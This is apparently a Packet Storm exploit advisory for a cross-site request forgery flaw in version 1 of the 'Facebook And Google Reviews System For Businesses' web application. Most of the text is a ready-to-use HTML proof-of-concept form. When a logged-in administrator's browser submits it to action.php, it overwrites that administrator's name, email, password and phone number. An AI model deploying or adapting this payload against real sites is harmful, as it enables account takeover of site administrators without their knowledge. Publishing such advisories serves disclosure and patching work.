Facebook And Google Reviews System For Business version 1.0 suffers from a cross site request forgery vulnerability.
23409162eb34a269e30c2bc97e6f4ec00055868c8aa81fe90f9576549c8e9718# Exploit Title: Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery
# Date: 2018-12-13
# Exploit Author: Veyselxan
# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559?s_rank=38
# Version: v1 (REQUIRED)
# Tested on: Linux
# 1 Poof Of Concept (Change password):
<html>
<body>
<form action="http://Target/action.php?action=profile" method="post" class="form-horizontal form-bordered">
<input class="form-control" name="name" value="Admin" type="text">
<input class="form-control" name="email" value="admin@ranksol.com" type="text">
<input class="form-control" name="password" value="password" type="text">
<input class="form-control" name="phone" value="+18323041166" type="text">
<input type="hidden" name="id" value="1">
<button type="submit" name="submit" value="submit" class="btn btn-fill btn-success "><span class="ace-icon fa fa-save bigger-120"></span>Save</button>
</form>
</body>
</html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed